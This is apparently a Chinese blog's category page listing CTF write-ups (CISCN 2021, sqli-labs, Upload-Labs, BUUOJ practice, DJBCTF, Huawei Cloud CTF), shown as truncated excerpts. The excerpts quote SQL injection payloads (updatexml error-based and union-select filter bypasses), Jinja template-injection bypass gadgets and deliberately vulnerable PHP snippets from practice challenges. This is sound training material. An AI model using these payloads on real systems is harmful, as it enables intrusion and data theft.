分类: CTF WriteUP

42 篇文章

thumbnail
2021 CISCN 初赛 web wp
今年比去年难多了也卷多了还脑洞多了,期待后面的wp。 easy_sql 无列名报错注入,猜了个flag表 # 数据库 admin') or updatexml(1,concat(0x7e,(select database()),0x7e),1);# # 字段名 admin') or updatexml(1,concat(0x7e,(select *…
thumbnail
Upload-Labs题解
感谢大佬们做的靶场,学到了不少东西。 环境搭建 提供了Windows集成和Linux Docker两种快速搭建方式,直接Docker起了,Docker yyds。 $ docker pull c0ny1/upload-labs $ docker run -d -p 80:80 c0ny1/upload-labs:latest pass-01 fun…
thumbnail
sqli-labs题解(Less-1 -> Less-53)
环境搭建 docker 题解 less-1 -> less-4 有回显有报错,尝试联合注入。 ?id=1' order by 3;--+ # 爆字段数 ?id=-1' union select 1,2,database();--+ # 爆库名 ?id=-1' union select 1,2,group_concat(table_name) …
BUU日常刷题记录
回归初心,刷题快乐。 [WesternCTF2018]shrine 源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return ope…
BUU刷题记录(2.21-2.27)
[GWCTF 2019]我有一个数据库 没猜到有个数据库。 访问页面/phpmyadmin/,没有密码,不过也没有表,找一下版本号4.8.1,找CVE打。 下载4.8.1的源码。由于找不到,直接把题目环境扒下来了。 // If we have a valid target, let's load that script instead if (! …
thumbnail
BUU刷题记录(2.1-2.7)
<?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GE…
thumbnail
BUUOJ刷题记录(1.25-1.31)
[网鼎杯 2018]Fakebook user.php.bak源码 注册完账号查看信息的时候可以看到采用get的方式来搜索序号。 ?no=1 相对来说比较简单的注入,过滤了union select,但是可以通过/**/绕过。 ?no=0 union/**/select 1,2,3,4;# 易得2为注入点,爆库 ?no=0 union/**/sele…
thumbnail
DJBCTF 2021 WP
CTF-SHOW的比赛,刚回到家,沉迷摸鱼,比赛打完了复现。 veryphp 缝合怪 <?php error_reporting(0); highlight_file(__FILE__); include("config.php"); class qwq { function __wakeup(){ die("Access Denied!")…
thumbnail
2020 huaweiyunctf
赛后看了writeup,记录几个tricks吧 mine1_1 两行代码等价 {{().__class__}} {{()|attr('__class__')}} 绕过姿势 {{(()|attr(request.values.a)).get(request.values.b).get(request.values.c)(request.values.…